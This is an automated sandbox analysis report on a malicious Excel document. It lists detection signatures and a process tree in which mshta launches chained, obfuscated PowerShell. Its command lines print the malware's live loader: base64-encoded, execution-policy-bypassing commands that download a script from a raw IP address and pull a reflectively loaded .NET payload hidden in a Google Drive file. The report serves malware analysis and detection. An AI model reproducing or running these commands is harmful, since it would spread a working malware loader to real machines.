Windows Analysis Report
A & C Metrology OC 5457144.xls

Overview

General Information

Sample name: A & C Metrology OC 5457144.xls
Analysis ID: 1540833
MD5: 48c40411ba277f1c9829871605366dc0
SHA1: 8e2a93e0bd4e23b655de720b5d75f1e01420c17e
SHA256: 86e985895fb6d155d4d6c894c8d038b76f5e6db694ca0c59867ee43867d49f61
Tags: xls, user-abuse_ch
Infos:

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Bypasses PowerShell execution policy
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Installs new ROOT certificates
Machine Learning detection for sample
Microsoft Office drops suspicious files
Obfuscated command line found
PowerShell case anomaly found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Compiles C# or VB.Net code
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Excel Network Connections
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 3404 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • mshta.exe (PID: 3688 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)
      • powershell.exe (PID: 3772 cmdline: "C:\Windows\syStem32\wiNdOWSPOwErsHElL\v1.0\POWeRshElL.eXE" "PoWeRSheLl.Exe -ex BYpass -NoP -W 1 -c dEvIcECRedEntiaLdePlOymeNt ; iEx($(Iex('[SysTem.TEXT.ENcoDIng]'+[chAR]58+[CHaR]0x3A+'Utf8.gETSTRING([SYStEM.COnVErT]'+[Char]58+[CHar]0x3a+'frOMbaSE64StrInG('+[cHar]34+'JGJxbElEWUQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNQmVyREVmaW5pdElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYdHJiSHMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBubGNyLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgR3l2cix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJicSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BhQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpYYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGJxbElEWUQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMjEwLjIxNS44LzU0MC9jcmVhdGVkYmVzdHRoaW5nc3dpdGhuaWNld29ya2dyZWF0aC50SUYiLCIkRW5WOkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRobmljZXdvcmtncmVhdC52YlMiLDAsMCk7U1RhUlQtc0xlZVAoMyk7c3RBclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRobmljZXdvcmtncmVhdC52YlMi'+[CHAr]0X22+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
        • powershell.exe (PID: 3876 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex BYpass -NoP -W 1 -c dEvIcECRedEntiaLdePlOymeNt MD5: A575A7610E5F003CC36DF39E07C4BA7D)
        • csc.exe (PID: 3980 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\td4qmpaq\td4qmpaq.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
          • cvtres.exe (PID: 3988 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES955D.tmp" "c:\Users\user\AppData\Local\Temp\td4qmpaq\CSC7C3FCBBFF452466CBE70AA6FD2E366A.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
        • wscript.exe (PID: 4080 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createdbestthingswithniceworkgreat.vbS" MD5: 045451FA238A75305CC26AC982472367)
          • powershell.exe (PID: 2504 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRlTnY6Y29tU3BlQ1s0LDE1LDI1XS1qb2luJycpICggKCgnRzJOaW1hZ2VVcmwgPSBtODdodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNicrJ3ZTNHNVT3libkgtc0R2VScrJ2hCWXd1ciBtODc7RzJOd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtHMk5pbWFnZUJ5dGVzID0gRzJOd2ViQ2xpZW50LkRvd25sb2FkRGF0YShHMk5pbWFnZVVybCk7RzJOaW1hZ2UnKydUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaScrJ25nXTo6VVRGOC5HZXRTdHJpbmcoRzJOaW1hZ2VCeXRlJysncyk7RzJOc3RhcnRGbGFnID0gbTg3PDxCQVNFNjRfU1RBUlQ+Pm04NztHMk5lbmRGbGFnID0gbTg3PDxCQVNFNjRfRU5EPj5tJysnODc7RzJOc3RhcnRJbmRleCcrJyA9ICcrJ0cyTmltJysnYWdlVGV4dC5JbmRleE9mKEcyTnN0YXJ0RmxhZyk7RzJOZW5kSW5kZXggPSBHMk5pbWFnZVRleHQnKycuSW5kZXhPZicrJyhHMk5lbmRGbGFnKTtHMk5zdGFydEluZCcrJ2V4ICcrJy1nZSAwIC1hbmQnKycgRzJOZW5kSW5kZXggLWd0IEcyTnN0YXJ0SW5kZXg7RzJOc3RhcnRJbmRleCArPSBHMk5zdGFydEZsYWcuTGUnKyduZ3RoO0cyTmJhc2U2NExlbmd0aCA9IEcyTmVuZEluZGV4IC0gRzJOc3RhcnRJbmRleDtHMk5iYXNlNjRDJysnb21tYW5kID0gRzJOaW1hZ2VUZXh0LicrJ1N1YnN0cmluZyhHMk5zdCcrJ2FydEluJysnZGV4LCBHMk5iYXNlNjRMZW5nJysndGgpO0cyTmJhc2U2NFJldmUnKydyc2VkID0gLWpvaW4nKycgKEcyTmInKydhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSAnKydDSUsgRm9yRWFjaC1PYmplY3QgeyBHMk5fIH0pWy0xLi4tKEcyTmJhc2U2NENvbW1hbmQuTGVuZ3RoKV0nKyc7RzJOY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RicrJ3JvbUJhc2U2NFN0cmluZyhHMk5iYXNlNjRSZXZlcnNlZCk7RzJObG9hZGVkQXNzZW1iJysnbHkgPSAnKydbU3lzdCcrJ2VtLlJlZmxlY3Rpb24uQXMnKydzZW1ibHldOjpMb2FkKEcyTmNvbW1hbmRCeXRlcyk7RzJOdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChtODdWQUltODcpO0cyTnZhaU1ldGhvZC5JbnZva2UoRzJObnVsbCwgQChtODd0eHQuUkRGRlJFJysnLzA0NScrJy84LjUxMi4wMTIuMjkxLy86cHR0aG04NywgbTg3ZGUnKydzYXRpdmFkb204NywgbScrJzg3ZGVzYXRpdmEnKydkb204NywgbTg3ZGVzYXRpdmFkb204NywgbTg3QWRkSW5Qcm9jZXNzMzJtODcsIG04JysnN2Rlc2F0aXZhZG9tODcsIG04JysnN2Rlc2F0aXZhZG9tODcsbTg3ZGVzYXRpdmFkb204NyxtODdkZXNhdGl2YWRvbTg3LG04N2Rlc2F0aXZhZG9tODcsbTg3ZGVzYXRpdmFkb204NyxtODdkZXNhdGknKyd2YWRvbTg3LG04NzFtODcsbTg3Z
GVzYXRpdmFkb204NykpOycpIC1SRVBMYUNFKFtDSEFyXTcxK1tDSEFyXTUwK1tDSEFyXTc4KSxbQ0hBcl0zNi1SRVBMYUNFJ204NycsW0NIQXJdMzktQ3JlcExBY0UgIChbQ0hBcl02NytbQ0hBcl03MytbQ0hBcl03NSksW0NIQXJdMTI0KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: A575A7610E5F003CC36DF39E07C4BA7D)
            • powershell.exe (PID: 204 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $eNv:comSpeC[4,15,25]-join'') ( (('G2NimageUrl = m87https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvU'+'hBYwur m87;G2NwebClient = New-Object System.Net.WebClient;G2NimageBytes = G2NwebClient.DownloadData(G2NimageUrl);G2Nimage'+'Text = [System.Text.Encodi'+'ng]::UTF8.GetString(G2NimageByte'+'s);G2NstartFlag = m87<<BASE64_START>>m87;G2NendFlag = m87<<BASE64_END>>m'+'87;G2NstartIndex'+' = '+'G2Nim'+'ageText.IndexOf(G2NstartFlag);G2NendIndex = G2NimageText'+'.IndexOf'+'(G2NendFlag);G2NstartInd'+'ex '+'-ge 0 -and'+' G2NendIndex -gt G2NstartIndex;G2NstartIndex += G2NstartFlag.Le'+'ngth;G2Nbase64Length = G2NendIndex - G2NstartIndex;G2Nbase64C'+'ommand = G2NimageText.'+'Substring(G2Nst'+'artIn'+'dex, G2Nbase64Leng'+'th);G2Nbase64Reve'+'rsed = -join'+' (G2Nb'+'ase64Command.ToCharArray() '+'CIK ForEach-Object { G2N_ })[-1..-(G2Nbase64Command.Length)]'+';G2NcommandBytes = [System.Convert]::F'+'romBase64String(G2Nbase64Reversed);G2NloadedAssemb'+'ly = '+'[Syst'+'em.Reflection.As'+'sembly]::Load(G2NcommandBytes);G2NvaiMethod = [dnlib.IO.Home].GetMethod(m87VAIm87);G2NvaiMethod.Invoke(G2Nnull, @(m87txt.RDFFRE'+'/045'+'/8.512.012.291//:ptthm87, m87de'+'sativadom87, m'+'87desativa'+'dom87, m87desativadom87, m87AddInProcess32m87, m8'+'7desativadom87, m8'+'7desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desati'+'vadom87,m871m87,m87desativadom87));') -REPLaCE([CHAr]71+[CHAr]50+[CHAr]78),[CHAr]36-REPLaCE'm87',[CHAr]39-CrepLAcE ([CHAr]67+[CHAr]73+[CHAr]75),[CHAr]124) )" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
    • mshta.exe (PID: 1884 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)
      • powershell.exe (PID: 1040 cmdline: "C:\Windows\syStem32\wiNdOWSPOwErsHElL\v1.0\POWeRshElL.eXE" "PoWeRSheLl.Exe -ex BYpass -NoP -W 1 -c dEvIcECRedEntiaLdePlOymeNt ; iEx($(Iex('[SysTem.TEXT.ENcoDIng]'+[chAR]58+[CHaR]0x3A+'Utf8.gETSTRING([SYStEM.COnVErT]'+[Char]58+[CHar]0x3a+'frOMbaSE64StrInG('+[cHar]34+'JGJxbElEWUQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNQmVyREVmaW5pdElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYdHJiSHMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBubGNyLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgR3l2cix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJicSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BhQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpYYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGJxbElEWUQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMjEwLjIxNS44LzU0MC9jcmVhdGVkYmVzdHRoaW5nc3dpdGhuaWNld29ya2dyZWF0aC50SUYiLCIkRW5WOkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRobmljZXdvcmtncmVhdC52YlMiLDAsMCk7U1RhUlQtc0xlZVAoMyk7c3RBclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRobmljZXdvcmtncmVhdC52YlMi'+[CHAr]0X22+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
        • powershell.exe (PID: 1208 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex BYpass -NoP -W 1 -c dEvIcECRedEntiaLdePlOymeNt MD5: A575A7610E5F003CC36DF39E07C4BA7D)
        • csc.exe (PID: 1132 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mans504x\mans504x.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
          • cvtres.exe (PID: 848 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD71D.tmp" "c:\Users\user\AppData\Local\Temp\mans504x\CSCCEA378A2A3F7449F819B5EAA6DFD95A.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
        • wscript.exe (PID: 3584 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createdbestthingswithniceworkgreat.vbS" MD5: 045451FA238A75305CC26AC982472367)
          • powershell.exe (PID: 3732 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRlTnY6Y29tU3BlQ1s0LDE1LDI1XS1qb2luJycpICggKCgnRzJOaW1hZ2VVcmwgPSBtODdodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNicrJ3ZTNHNVT3libkgtc0R2VScrJ2hCWXd1ciBtODc7RzJOd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtHMk5pbWFnZUJ5dGVzID0gRzJOd2ViQ2xpZW50LkRvd25sb2FkRGF0YShHMk5pbWFnZVVybCk7RzJOaW1hZ2UnKydUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaScrJ25nXTo6VVRGOC5HZXRTdHJpbmcoRzJOaW1hZ2VCeXRlJysncyk7RzJOc3RhcnRGbGFnID0gbTg3PDxCQVNFNjRfU1RBUlQ+Pm04NztHMk5lbmRGbGFnID0gbTg3PDxCQVNFNjRfRU5EPj5tJysnODc7RzJOc3RhcnRJbmRleCcrJyA9ICcrJ0cyTmltJysnYWdlVGV4dC5JbmRleE9mKEcyTnN0YXJ0RmxhZyk7RzJOZW5kSW5kZXggPSBHMk5pbWFnZVRleHQnKycuSW5kZXhPZicrJyhHMk5lbmRGbGFnKTtHMk5zdGFydEluZCcrJ2V4ICcrJy1nZSAwIC1hbmQnKycgRzJOZW5kSW5kZXggLWd0IEcyTnN0YXJ0SW5kZXg7RzJOc3RhcnRJbmRleCArPSBHMk5zdGFydEZsYWcuTGUnKyduZ3RoO0cyTmJhc2U2NExlbmd0aCA9IEcyTmVuZEluZGV4IC0gRzJOc3RhcnRJbmRleDtHMk5iYXNlNjRDJysnb21tYW5kID0gRzJOaW1hZ2VUZXh0LicrJ1N1YnN0cmluZyhHMk5zdCcrJ2FydEluJysnZGV4LCBHMk5iYXNlNjRMZW5nJysndGgpO0cyTmJhc2U2NFJldmUnKydyc2VkID0gLWpvaW4nKycgKEcyTmInKydhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSAnKydDSUsgRm9yRWFjaC1PYmplY3QgeyBHMk5fIH0pWy0xLi4tKEcyTmJhc2U2NENvbW1hbmQuTGVuZ3RoKV0nKyc7RzJOY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RicrJ3JvbUJhc2U2NFN0cmluZyhHMk5iYXNlNjRSZXZlcnNlZCk7RzJObG9hZGVkQXNzZW1iJysnbHkgPSAnKydbU3lzdCcrJ2VtLlJlZmxlY3Rpb24uQXMnKydzZW1ibHldOjpMb2FkKEcyTmNvbW1hbmRCeXRlcyk7RzJOdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChtODdWQUltODcpO0cyTnZhaU1ldGhvZC5JbnZva2UoRzJObnVsbCwgQChtODd0eHQuUkRGRlJFJysnLzA0NScrJy84LjUxMi4wMTIuMjkxLy86cHR0aG04NywgbTg3ZGUnKydzYXRpdmFkb204NywgbScrJzg3ZGVzYXRpdmEnKydkb204NywgbTg3ZGVzYXRpdmFkb204NywgbTg3QWRkSW5Qcm9jZXNzMzJtODcsIG04JysnN2Rlc2F0aXZhZG9tODcsIG04JysnN2Rlc2F0aXZhZG9tODcsbTg3ZGVzYXRpdmFkb204NyxtODdkZXNhdGl2YWRvbTg3LG04N2Rlc2F0aXZhZG9tODcsbTg3ZGVzYXRpdmFkb204NyxtODdkZXNhdGknKyd2YWRvbTg3LG04NzFtODcsbTg3Z
GVzYXRpdmFkb204NykpOycpIC1SRVBMYUNFKFtDSEFyXTcxK1tDSEFyXTUwK1tDSEFyXTc4KSxbQ0hBcl0zNi1SRVBMYUNFJ204NycsW0NIQXJdMzktQ3JlcExBY0UgIChbQ0hBcl02NytbQ0hBcl03MytbQ0hBcl03NSksW0NIQXJdMTI0KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: A575A7610E5F003CC36DF39E07C4BA7D)
            • powershell.exe (PID: 3900 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $eNv:comSpeC[4,15,25]-join'') ( (('G2NimageUrl = m87https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvU'+'hBYwur m87;G2NwebClient = New-Object System.Net.WebClient;G2NimageBytes = G2NwebClient.DownloadData(G2NimageUrl);G2Nimage'+'Text = [System.Text.Encodi'+'ng]::UTF8.GetString(G2NimageByte'+'s);G2NstartFlag = m87<<BASE64_START>>m87;G2NendFlag = m87<<BASE64_END>>m'+'87;G2NstartIndex'+' = '+'G2Nim'+'ageText.IndexOf(G2NstartFlag);G2NendIndex = G2NimageText'+'.IndexOf'+'(G2NendFlag);G2NstartInd'+'ex '+'-ge 0 -and'+' G2NendIndex -gt G2NstartIndex;G2NstartIndex += G2NstartFlag.Le'+'ngth;G2Nbase64Length = G2NendIndex - G2NstartIndex;G2Nbase64C'+'ommand = G2NimageText.'+'Substring(G2Nst'+'artIn'+'dex, G2Nbase64Leng'+'th);G2Nbase64Reve'+'rsed = -join'+' (G2Nb'+'ase64Command.ToCharArray() '+'CIK ForEach-Object { G2N_ })[-1..-(G2Nbase64Command.Length)]'+';G2NcommandBytes = [System.Convert]::F'+'romBase64String(G2Nbase64Reversed);G2NloadedAssemb'+'ly = '+'[Syst'+'em.Reflection.As'+'sembly]::Load(G2NcommandBytes);G2NvaiMethod = [dnlib.IO.Home].GetMethod(m87VAIm87);G2NvaiMethod.Invoke(G2Nnull, @(m87txt.RDFFRE'+'/045'+'/8.512.012.291//:ptthm87, m87de'+'sativadom87, m'+'87desativa'+'dom87, m87desativadom87, m87AddInProcess32m87, m8'+'7desativadom87, m8'+'7desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desati'+'vadom87,m871m87,m87desativadom87));') -REPLaCE([CHAr]71+[CHAr]50+[CHAr]78),[CHAr]36-REPLaCE'm87',[CHAr]39-CrepLAcE ([CHAr]67+[CHAr]73+[CHAr]75),[CHAr]124) )" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
Process Memory Space: powershell.exe PID: 204 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: powershell.exe PID: 204 | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
    • 0x3d58:$b2: ::FromBase64String(
    • 0x55f0:$b2: ::FromBase64String(
    • 0x5a8c:$b2: ::FromBase64String(
    • 0x2c71:$b3: ::UTF8.GetString(
    • 0x3b21:$b3: ::UTF8.GetString(
    • 0x53ed:$b3: ::UTF8.GetString(
    • 0x5893:$b3: ::UTF8.GetString(
    • 0x1d73d:$b3: ::UTF8.GetString(
    • 0x1ddb9:$b3: ::UTF8.GetString(
    • 0x449d4:$b3: ::UTF8.GetString(
    • 0x4501c:$b3: ::UTF8.GetString(
    • 0x4aa77:$b3: ::UTF8.GetString(
    • 0x4b264:$b3: ::UTF8.GetString(
    • 0x4b8e9:$b3: ::UTF8.GetString(
    • 0x62b72:$b3: ::UTF8.GetString(
    • 0x6bf4b:$b3: ::UTF8.GetString(
    • 0x70604:$b3: ::UTF8.GetString(
    • 0x70c7f:$b3: ::UTF8.GetString(
    • 0x71e1a:$b3: ::UTF8.GetString(
    • 0x766d4:$b3: ::UTF8.GetString(
    • 0x76d4e:$b3: ::UTF8.GetString(
Process Memory Space: powershell.exe PID: 3900 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: powershell.exe PID: 3900 | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
      • 0x4809e:$b2: ::FromBase64String(
      • 0x49928:$b2: ::FromBase64String(
      • 0x49dc4:$b2: ::FromBase64String(
      • 0x496d:$b3: ::UTF8.GetString(
      • 0x4fe7:$b3: ::UTF8.GetString(
      • 0xab35:$b3: ::UTF8.GetString(
      • 0xb1b0:$b3: ::UTF8.GetString(
      • 0xc27d:$b3: ::UTF8.GetString(
      • 0xfa72:$b3: ::UTF8.GetString(
      • 0x10259:$b3: ::UTF8.GetString(
      • 0x397a0:$b3: ::UTF8.GetString(
      • 0x39e4f:$b3: ::UTF8.GetString(
      • 0x46fd0:$b3: ::UTF8.GetString(
      • 0x47e67:$b3: ::UTF8.GetString(
      • 0x49725:$b3: ::UTF8.GetString(
      • 0x49bcb:$b3: ::UTF8.GetString(
      • 0x611ab:$b3: ::UTF8.GetString(
      • 0x69793:$b3: ::UTF8.GetString(
      • 0x3b4a:$s1: -join
      • 0x4862:$s1: -join
      • 0x4b52:$s1: -join

      System Summary

      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRlTnY6Y29tU3BlQ1s0LDE1LDI1XS1qb2luJycpICggKCgnRzJOaW1hZ2VVcmwgPSBtODdodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNicrJ3ZTNHNVT3libkgtc0R2VScrJ2hCWXd1ciBtODc7RzJOd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtHMk5pbWFnZUJ5dGVzID0gRzJOd2ViQ2xpZW50LkRvd25sb2FkRGF0YShHMk5pbWFnZVVybCk7RzJOaW1hZ2UnKydUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaScrJ25nXTo6VVRGOC5HZXRTdHJpbmcoRzJOaW1hZ2VCeXRlJysncyk7RzJOc3RhcnRGbGFnID0gbTg3PDxCQVNFNjRfU1RBUlQ+Pm04NztHMk5lbmRGbGFnID0gbTg3PDxCQVNFNjRfRU5EPj5tJysnODc7RzJOc3RhcnRJbmRleCcrJyA9ICcrJ0cyTmltJysnYWdlVGV4dC5JbmRleE9mKEcyTnN0YXJ0RmxhZyk7RzJOZW5kSW5kZXggPSBHMk5pbWFnZVRleHQnKycuSW5kZXhPZicrJyhHMk5lbmRGbGFnKTtHMk5zdGFydEluZCcrJ2V4ICcrJy1nZSAwIC1hbmQnKycgRzJOZW5kSW5kZXggLWd0IEcyTnN0YXJ0SW5kZXg7RzJOc3RhcnRJbmRleCArPSBHMk5zdGFydEZsYWcuTGUnKyduZ3RoO0cyTmJhc2U2NExlbmd0aCA9IEcyTmVuZEluZGV4IC0gRzJOc3RhcnRJbmRleDtHMk5iYXNlNjRDJysnb21tYW5kID0gRzJOaW1hZ2VUZXh0LicrJ1N1YnN0cmluZyhHMk5zdCcrJ2FydEluJysnZGV4LCBHMk5iYXNlNjRMZW5nJysndGgpO0cyTmJhc2U2NFJldmUnKydyc2VkID0gLWpvaW4nKycgKEcyTmInKydhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSAnKydDSUsgRm9yRWFjaC1PYmplY3QgeyBHMk5fIH0pWy0xLi4tKEcyTmJhc2U2NENvbW1hbmQuTGVuZ3RoKV0nKyc7RzJOY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RicrJ3JvbUJhc2U2NFN0cmluZyhHMk5iYXNlNjRSZXZlcnNlZCk7RzJObG9hZGVkQXNzZW1iJysnbHkgPSAnKydbU3lzdCcrJ2VtLlJlZmxlY3Rpb24uQXMnKydzZW1ibHldOjpMb2FkKEcyTmNvbW1hbmRCeXRlcyk7RzJOdmFpTWV0aG9kID0gW2RubGliLklPLkhv